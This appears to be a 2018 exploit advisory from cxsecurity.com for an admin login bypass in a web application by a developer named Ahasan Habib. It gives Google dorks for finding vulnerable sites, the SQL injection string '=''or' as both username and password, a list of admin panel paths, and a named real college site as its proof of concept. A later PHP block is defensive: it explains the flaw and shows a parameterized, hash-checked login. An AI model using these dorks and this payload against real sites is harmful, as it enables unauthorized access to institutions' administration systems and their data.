Design & Development World IT Expert Ahasan Habib Admin Login Bypass Vulnerability

2018.07.07
Risk: Medium
Local: No
Remote: Yes
CVE: N/A

#################################################################################################

# Exploit Title : Design & Development World IT Expert Ahasan Habib Admin Login Bypass Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 07/07/2018
# Vendor Homepage : worlditexpert.com
# Tested On : Windows
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-592 [ Authentication Bypass Issues ] + CWE-264 [ Permissions, Privileges, and Access Controls ]

#################################################################################################

# Google Dorks :
intext:''Design & Development World IT Expert'' site:bd
intext:''© Develop By: Ahasan Habib''

# Administration Control Panel Path : /admin

# Exploit :
Username : '=''or'
Password : '=''or'

Useable Administration Control Panel URL Links =>
/admin/home.php
/admin/routine.php
/admin/syllabus.php
/admin/notice.php
/admin/teacher.php
/admin/view_teacher.php
/admin/department.php
/admin/pages_timeline.html
/admin/view_result.php
/admin/insert_result.php
/admin/creat_menu.php
/admin/creat_sub_menu.php
/admin/gallery.html
/admin/tables.html
/admin/maps.html
/admin/subject.php
/admin/blank.html
/admin/blank2.html
/admin/login.html

#################################################################################################

# Example Site => mrahamancollegepanchagarh.edu.bd => [ Proof of Concept ] => archive.is/T8IdV

#################################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

#################################################################################################
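
The advisory lists the bypass values but not the cause or the fix. The block below is an added example, not code from the vendor or from the advisory's author: it assumes the login page splices form input into a MySQL query, and it shows that assumed pattern beside a parameterized check. The table and column names, the helpers make_demo_db, concatenated_sql and check_login, and the demo password are hypothetical; it runs on PHP with the pdo_sqlite extension.

```php
<?php
declare(strict_types=1);

// Constructed in-memory SQLite table standing in for the application's admin
// table. The table and column names are assumptions, not the vendor's schema.
function make_demo_db(): PDO
{
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $db->exec('CREATE TABLE admin (username TEXT PRIMARY KEY, password_hash TEXT NOT NULL)');
    $ins = $db->prepare('INSERT INTO admin (username, password_hash) VALUES (?, ?)');
    $ins->execute(['admin', password_hash('constructed-demo-password', PASSWORD_DEFAULT)]);
    return $db;
}

// Assumed vulnerable pattern: form input spliced into the SQL text. Only the
// resulting string is built here; it is never executed.
function concatenated_sql(string $user, string $pass): string
{
    return "SELECT * FROM admin WHERE username='$user' AND password='$pass'";
}

// Hardened check: the username is bound as a parameter, so quotes in it stay
// data, and the password is verified against a stored hash instead of being
// compared inside the query.
function check_login(PDO $db, string $user, string $pass): bool
{
    $stmt = $db->prepare('SELECT password_hash FROM admin WHERE username = ?');
    $stmt->execute([$user]);
    $hash = $stmt->fetchColumn();
    return is_string($hash) && password_verify($pass, $hash);
}

$db = make_demo_db();
$listed = "'=''or'"; // the username/password value listed in the advisory

// With concatenation the quotes close the literals and the WHERE clause becomes
// username=''=''or'' AND password=''=''or''. MySQL evaluates (username='')=''
// as 0 = '', coerces '' to 0, and the condition is true for every row.
echo concatenated_sql($listed, $listed), PHP_EOL;

// With a bound parameter the same value is just a username that does not exist.
echo 'listed value accepted: ', var_export(check_login($db, $listed, $listed), true), PHP_EOL;
echo 'real credentials accepted: ',
    var_export(check_login($db, 'admin', 'constructed-demo-password'), true), PHP_EOL;
```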



Copyright 2018, cxsecurity.com

 
